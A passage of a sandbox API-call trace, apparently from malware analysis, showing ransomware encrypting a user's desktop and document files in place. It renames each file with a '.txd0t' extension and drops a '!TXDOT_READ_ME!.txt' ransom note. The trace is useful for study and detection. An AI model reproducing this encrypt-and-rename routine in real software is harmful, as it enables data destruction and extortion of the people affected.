psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\TLtL7FqQ6HKzRKYgMVx.mp3") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\TLtL7FqQ6HKzRKYgMVx.mp3" [0073.838] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\TLtL7FqQ6HKzRKYgMVx.mp3", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\TLtL7FqQ6HKzRKYgMVx.mp3.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\TLtL7FqQ6HKzRKYgMVx.mp3.txd0t" [0073.838] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\TLtL7FqQ6HKzRKYgMVx.mp3.txd0t") returned 0 [0073.838] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\TLtL7FqQ6HKzRKYgMVx.mp3", dwFileAttributes=0x80) returned 1 [0073.839] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\TLtL7FqQ6HKzRKYgMVx.mp3" (normalized: "c:\\users\\fd1hvy\\desktop\\tltl7fqq6hkzrkygmvx.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x46c [0073.839] GetFileSizeEx (in: hFile=0x46c, lpFileSize=0x4a9fcec | out: lpFileSize=0x4a9fcec*=62616) returned 1 [0073.839] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0073.839] WriteFile (in: hFile=0x46c, lpBuffer=0x4a9f9d0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4a9fce8, lpOverlapped=0x0 | out: lpBuffer=0x4a9f9d0*, lpNumberOfBytesWritten=0x4a9fce8*=0x200, lpOverlapped=0x0) returned 1 [0073.839] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0xffff0968, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.839] ReadFile (in: hFile=0x46c, lpBuffer=0x415b020, nNumberOfBytesToRead=0xf490, lpNumberOfBytesRead=0x4a9f700, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesRead=0x4a9f700*=0xf490, lpOverlapped=0x0) returned 1 [0073.840] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0xffff0b70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.840] WriteFile (in: hFile=0x46c, lpBuffer=0x415b020*, nNumberOfBytesToWrite=0xf490, lpNumberOfBytesWritten=0x4a9f704, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesWritten=0x4a9f704*=0xf490, lpOverlapped=0x0) returned 1 [0073.841] FlushFileBuffers (hFile=0x46c) returned 1 [0073.846] GetProcessHeap () returned 0xe30000 [0073.846] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x10e) returned 0xed3048 [0073.846] StrCpyW (in: psz1=0xed3048, psz2="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\TLtL7FqQ6HKzRKYgMVx.mp3" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\TLtL7FqQ6HKzRKYgMVx.mp3") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\TLtL7FqQ6HKzRKYgMVx.mp3" [0073.846] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\TLtL7FqQ6HKzRKYgMVx.mp3") returned="TLtL7FqQ6HKzRKYgMVx.mp3" [0073.846] StrCpyW (in: psz1=0xed3080, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0073.846] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\!TXDOT_READ_ME!.txt") returned 1 [0073.847] GetProcessHeap () returned 0xe30000 [0073.847] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed3048 | out: hHeap=0xe30000) returned 1 [0073.847] CloseHandle (hObject=0x46c) returned 1 [0073.854] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\TLtL7FqQ6HKzRKYgMVx.mp3" (normalized: "c:\\users\\fd1hvy\\desktop\\tltl7fqq6hkzrkygmvx.mp3"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\TLtL7FqQ6HKzRKYgMVx.mp3.txd0t" (normalized: "c:\\users\\fd1hvy\\desktop\\tltl7fqq6hkzrkygmvx.mp3.txd0t")) returned 1 [0073.855] SetEvent (hEvent=0x40c) returned 1 [0073.855] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x0 [0073.861] StrCpyW (in: psz1=0x4a9f740, psz2="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\VCbe_Sa0NEidgDcyfgFz.flv" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\VCbe_Sa0NEidgDcyfgFz.flv") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\VCbe_Sa0NEidgDcyfgFz.flv" [0073.862] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\VCbe_Sa0NEidgDcyfgFz.flv", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\VCbe_Sa0NEidgDcyfgFz.flv.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\VCbe_Sa0NEidgDcyfgFz.flv.txd0t" [0073.862] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\VCbe_Sa0NEidgDcyfgFz.flv.txd0t") returned 0 [0073.862] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\VCbe_Sa0NEidgDcyfgFz.flv", dwFileAttributes=0x80) returned 1 [0073.862] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\VCbe_Sa0NEidgDcyfgFz.flv" (normalized: "c:\\users\\fd1hvy\\desktop\\vcbe_sa0neidgdcyfgfz.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x47c [0073.863] GetFileSizeEx (in: hFile=0x47c, lpFileSize=0x4a9fcec | out: lpFileSize=0x4a9fcec*=95776) returned 1 [0073.863] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0073.863] WriteFile (in: hFile=0x47c, lpBuffer=0x4a9f9d0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4a9fce8, lpOverlapped=0x0 | out: lpBuffer=0x4a9f9d0*, lpNumberOfBytesWritten=0x4a9fce8*=0x200, lpOverlapped=0x0) returned 1 [0073.863] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0xfffe87e0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.863] ReadFile (in: hFile=0x47c, lpBuffer=0x415b020, nNumberOfBytesToRead=0x17620, lpNumberOfBytesRead=0x4a9f700, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesRead=0x4a9f700*=0x17620, lpOverlapped=0x0) returned 1 [0073.865] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0xfffe89e0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.865] WriteFile (in: hFile=0x47c, lpBuffer=0x415b020*, nNumberOfBytesToWrite=0x17620, lpNumberOfBytesWritten=0x4a9f704, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesWritten=0x4a9f704*=0x17620, lpOverlapped=0x0) returned 1 [0073.866] FlushFileBuffers (hFile=0x47c) returned 1 [0073.872] GetProcessHeap () returned 0xe30000 [0073.872] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x110) returned 0xed2be8 [0073.872] StrCpyW (in: psz1=0xed2be8, psz2="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\VCbe_Sa0NEidgDcyfgFz.flv" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\VCbe_Sa0NEidgDcyfgFz.flv") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\VCbe_Sa0NEidgDcyfgFz.flv" [0073.872] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\VCbe_Sa0NEidgDcyfgFz.flv") returned="VCbe_Sa0NEidgDcyfgFz.flv" [0073.872] StrCpyW (in: psz1=0xed2c20, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0073.872] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\!TXDOT_READ_ME!.txt") returned 1 [0073.872] GetProcessHeap () returned 0xe30000 [0073.873] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed2be8 | out: hHeap=0xe30000) returned 1 [0073.873] CloseHandle (hObject=0x47c) returned 1 [0073.875] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\VCbe_Sa0NEidgDcyfgFz.flv" (normalized: "c:\\users\\fd1hvy\\desktop\\vcbe_sa0neidgdcyfgfz.flv"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\VCbe_Sa0NEidgDcyfgFz.flv.txd0t" (normalized: "c:\\users\\fd1hvy\\desktop\\vcbe_sa0neidgdcyfgfz.flv.txd0t")) returned 1 [0073.875] SetEvent (hEvent=0x40c) returned 1 [0073.875] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x0 [0073.879] StrCpyW (in: psz1=0x4a9f750, psz2="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\WDZdqCHFFcmh9_.mp3" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\WDZdqCHFFcmh9_.mp3") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\WDZdqCHFFcmh9_.mp3" [0073.879] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\WDZdqCHFFcmh9_.mp3", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\WDZdqCHFFcmh9_.mp3.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\WDZdqCHFFcmh9_.mp3.txd0t" [0073.879] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\WDZdqCHFFcmh9_.mp3.txd0t") returned 0 [0073.879] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\WDZdqCHFFcmh9_.mp3", dwFileAttributes=0x80) returned 1 [0073.880] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\WDZdqCHFFcmh9_.mp3" (normalized: "c:\\users\\fd1hvy\\desktop\\wdzdqchffcmh9_.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x46c [0073.880] GetFileSizeEx (in: hFile=0x46c, lpFileSize=0x4a9fcec | out: lpFileSize=0x4a9fcec*=92554) returned 1 [0073.880] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0073.880] WriteFile (in: hFile=0x46c, lpBuffer=0x4a9f9d0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4a9fce8, lpOverlapped=0x0 | out: lpBuffer=0x4a9f9d0*, lpNumberOfBytesWritten=0x4a9fce8*=0x200, lpOverlapped=0x0) returned 1 [0073.880] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0xfffe9476, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.880] ReadFile (in: hFile=0x46c, lpBuffer=0x415b020, nNumberOfBytesToRead=0x16980, lpNumberOfBytesRead=0x4a9f710, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesRead=0x4a9f710*=0x16980, lpOverlapped=0x0) returned 1 [0073.882] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0xfffe9680, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.882] WriteFile (in: hFile=0x46c, lpBuffer=0x415b020*, nNumberOfBytesToWrite=0x16980, lpNumberOfBytesWritten=0x4a9f714, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesWritten=0x4a9f714*=0x16980, lpOverlapped=0x0) returned 1 [0073.883] FlushFileBuffers (hFile=0x46c) returned 1 [0073.889] GetProcessHeap () returned 0xe30000 [0073.889] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x104) returned 0xe9d750 [0073.889] StrCpyW (in: psz1=0xe9d750, psz2="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\WDZdqCHFFcmh9_.mp3" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\WDZdqCHFFcmh9_.mp3") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\WDZdqCHFFcmh9_.mp3" [0073.889] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\WDZdqCHFFcmh9_.mp3") returned="WDZdqCHFFcmh9_.mp3" [0073.889] StrCpyW (in: psz1=0xe9d788, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0073.889] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\!TXDOT_READ_ME!.txt") returned 1 [0073.889] GetProcessHeap () returned 0xe30000 [0073.889] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d750 | out: hHeap=0xe30000) returned 1 [0073.889] CloseHandle (hObject=0x46c) returned 1 [0073.891] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\WDZdqCHFFcmh9_.mp3" (normalized: "c:\\users\\fd1hvy\\desktop\\wdzdqchffcmh9_.mp3"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\WDZdqCHFFcmh9_.mp3.txd0t" (normalized: "c:\\users\\fd1hvy\\desktop\\wdzdqchffcmh9_.mp3.txd0t")) returned 1 [0073.892] SetEvent (hEvent=0x40c) returned 1 [0073.892] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x0 [0073.893] StrCpyW (in: psz1=0x4a9f750, psz2="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\yn-OCsN4T3Jmv.wav" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\yn-OCsN4T3Jmv.wav") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\yn-OCsN4T3Jmv.wav" [0073.893] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\yn-OCsN4T3Jmv.wav", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\yn-OCsN4T3Jmv.wav.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\yn-OCsN4T3Jmv.wav.txd0t" [0073.894] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\yn-OCsN4T3Jmv.wav.txd0t") returned 0 [0073.894] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\yn-OCsN4T3Jmv.wav", dwFileAttributes=0x80) returned 1 [0073.894] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\yn-OCsN4T3Jmv.wav" (normalized: "c:\\users\\fd1hvy\\desktop\\yn-ocsn4t3jmv.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x47c [0073.894] GetFileSizeEx (in: hFile=0x47c, lpFileSize=0x4a9fcec | out: lpFileSize=0x4a9fcec*=60515) returned 1 [0073.897] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0073.897] WriteFile (in: hFile=0x47c, lpBuffer=0x4a9f9d0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4a9fce8, lpOverlapped=0x0 | out: lpBuffer=0x4a9f9d0*, lpNumberOfBytesWritten=0x4a9fce8*=0x200, lpOverlapped=0x0) returned 1 [0073.898] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0xffff119d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.898] ReadFile (in: hFile=0x47c, lpBuffer=0x415b020, nNumberOfBytesToRead=0xec60, lpNumberOfBytesRead=0x4a9f710, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesRead=0x4a9f710*=0xec60, lpOverlapped=0x0) returned 1 [0073.899] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0xffff13a0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.899] WriteFile (in: hFile=0x47c, lpBuffer=0x415b020*, nNumberOfBytesToWrite=0xec60, lpNumberOfBytesWritten=0x4a9f714, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesWritten=0x4a9f714*=0xec60, lpOverlapped=0x0) returned 1 [0073.900] FlushFileBuffers (hFile=0x47c) returned 1 [0073.905] GetProcessHeap () returned 0xe30000 [0073.905] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x102) returned 0xe9d750 [0073.905] StrCpyW (in: psz1=0xe9d750, psz2="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\yn-OCsN4T3Jmv.wav" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\yn-OCsN4T3Jmv.wav") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\yn-OCsN4T3Jmv.wav" [0073.905] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\yn-OCsN4T3Jmv.wav") returned="yn-OCsN4T3Jmv.wav" [0073.905] StrCpyW (in: psz1=0xe9d788, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0073.905] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\!TXDOT_READ_ME!.txt") returned 1 [0073.905] GetProcessHeap () returned 0xe30000 [0073.905] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d750 | out: hHeap=0xe30000) returned 1 [0073.905] CloseHandle (hObject=0x47c) returned 1 [0073.907] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\yn-OCsN4T3Jmv.wav" (normalized: "c:\\users\\fd1hvy\\desktop\\yn-ocsn4t3jmv.wav"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\yn-OCsN4T3Jmv.wav.txd0t" (normalized: "c:\\users\\fd1hvy\\desktop\\yn-ocsn4t3jmv.wav.txd0t")) returned 1 [0073.908] SetEvent (hEvent=0x40c) returned 1 [0073.908] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x0 [0073.913] StrCpyW (in: psz1=0x4a9f750, psz2="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\ZSfJsNS2sePMKa.pps" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\ZSfJsNS2sePMKa.pps") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\ZSfJsNS2sePMKa.pps" [0073.913] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\ZSfJsNS2sePMKa.pps", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\ZSfJsNS2sePMKa.pps.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\ZSfJsNS2sePMKa.pps.txd0t" [0073.913] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\ZSfJsNS2sePMKa.pps.txd0t") returned 0 [0073.913] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\ZSfJsNS2sePMKa.pps", dwFileAttributes=0x80) returned 1 [0073.913] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\ZSfJsNS2sePMKa.pps" (normalized: "c:\\users\\fd1hvy\\desktop\\zsfjsns2sepmka.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x46c [0073.913] GetFileSizeEx (in: hFile=0x46c, lpFileSize=0x4a9fcec | out: lpFileSize=0x4a9fcec*=18657) returned 1 [0073.913] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0073.913] WriteFile (in: hFile=0x46c, lpBuffer=0x4a9f9d0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4a9fce8, lpOverlapped=0x0 | out: lpBuffer=0x4a9f9d0*, lpNumberOfBytesWritten=0x4a9fce8*=0x200, lpOverlapped=0x0) returned 1 [0073.914] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0xffffb51f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.914] ReadFile (in: hFile=0x46c, lpBuffer=0x415b020, nNumberOfBytesToRead=0x48e0, lpNumberOfBytesRead=0x4a9f710, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesRead=0x4a9f710*=0x48e0, lpOverlapped=0x0) returned 1 [0073.914] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0xffffb720, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.914] WriteFile (in: hFile=0x46c, lpBuffer=0x415b020*, nNumberOfBytesToWrite=0x48e0, lpNumberOfBytesWritten=0x4a9f714, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesWritten=0x4a9f714*=0x48e0, lpOverlapped=0x0) returned 1 [0073.914] FlushFileBuffers (hFile=0x46c) returned 1 [0073.930] GetProcessHeap () returned 0xe30000 [0073.931] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x104) returned 0xe9d750 [0073.931] StrCpyW (in: psz1=0xe9d750, psz2="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\ZSfJsNS2sePMKa.pps" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\ZSfJsNS2sePMKa.pps") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\ZSfJsNS2sePMKa.pps" [0073.931] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\ZSfJsNS2sePMKa.pps") returned="ZSfJsNS2sePMKa.pps" [0073.931] StrCpyW (in: psz1=0xe9d788, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0073.931] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\!TXDOT_READ_ME!.txt") returned 1 [0073.931] GetProcessHeap () returned 0xe30000 [0073.931] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d750 | out: hHeap=0xe30000) returned 1 [0073.931] CloseHandle (hObject=0x46c) returned 1 [0073.932] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\ZSfJsNS2sePMKa.pps" (normalized: "c:\\users\\fd1hvy\\desktop\\zsfjsns2sepmka.pps"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\ZSfJsNS2sePMKa.pps.txd0t" (normalized: "c:\\users\\fd1hvy\\desktop\\zsfjsns2sepmka.pps.txd0t")) returned 1 [0073.933] SetEvent (hEvent=0x40c) returned 1 [0073.933] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x0 [0073.938] StrCpyW (in: psz1=0x4a9f740, psz2="\\\\?\\C:\\Users\\FD1HVy\\Documents\\-nk0Jwf_DtIx7OFnM.xlsx" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\-nk0Jwf_DtIx7OFnM.xlsx") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\-nk0Jwf_DtIx7OFnM.xlsx" [0073.938] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\-nk0Jwf_DtIx7OFnM.xlsx", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\-nk0Jwf_DtIx7OFnM.xlsx.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\-nk0Jwf_DtIx7OFnM.xlsx.txd0t" [0073.938] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\-nk0Jwf_DtIx7OFnM.xlsx.txd0t") returned 0 [0073.938] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\-nk0Jwf_DtIx7OFnM.xlsx", dwFileAttributes=0x80) returned 1 [0073.938] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\-nk0Jwf_DtIx7OFnM.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\-nk0jwf_dtix7ofnm.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x47c [0073.938] GetFileSizeEx (in: hFile=0x47c, lpFileSize=0x4a9fcec | out: lpFileSize=0x4a9fcec*=39854) returned 1 [0073.938] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0073.938] WriteFile (in: hFile=0x47c, lpBuffer=0x4a9f9d0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4a9fce8, lpOverlapped=0x0 | out: lpBuffer=0x4a9f9d0*, lpNumberOfBytesWritten=0x4a9fce8*=0x200, lpOverlapped=0x0) returned 1 [0073.940] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0xffff6252, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.940] ReadFile (in: hFile=0x47c, lpBuffer=0x415b020, nNumberOfBytesToRead=0x9ba0, lpNumberOfBytesRead=0x4a9f700, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesRead=0x4a9f700*=0x9ba0, lpOverlapped=0x0) returned 1 [0073.941] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0xffff6460, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.941] WriteFile (in: hFile=0x47c, lpBuffer=0x415b020*, nNumberOfBytesToWrite=0x9ba0, lpNumberOfBytesWritten=0x4a9f704, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesWritten=0x4a9f704*=0x9ba0, lpOverlapped=0x0) returned 1 [0073.941] FlushFileBuffers (hFile=0x47c) returned 1 [0073.948] GetProcessHeap () returned 0xe30000 [0073.948] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x110) returned 0xed28a0 [0073.948] StrCpyW (in: psz1=0xed28a0, psz2="\\\\?\\C:\\Users\\FD1HVy\\Documents\\-nk0Jwf_DtIx7OFnM.xlsx" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\-nk0Jwf_DtIx7OFnM.xlsx") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\-nk0Jwf_DtIx7OFnM.xlsx" [0073.948] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\-nk0Jwf_DtIx7OFnM.xlsx") returned="-nk0Jwf_DtIx7OFnM.xlsx" [0073.948] StrCpyW (in: psz1=0xed28dc, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0073.948] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\!TXDOT_READ_ME!.txt") returned 0 [0073.948] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\!TXDOT_READ_ME!.txt" (normalized: 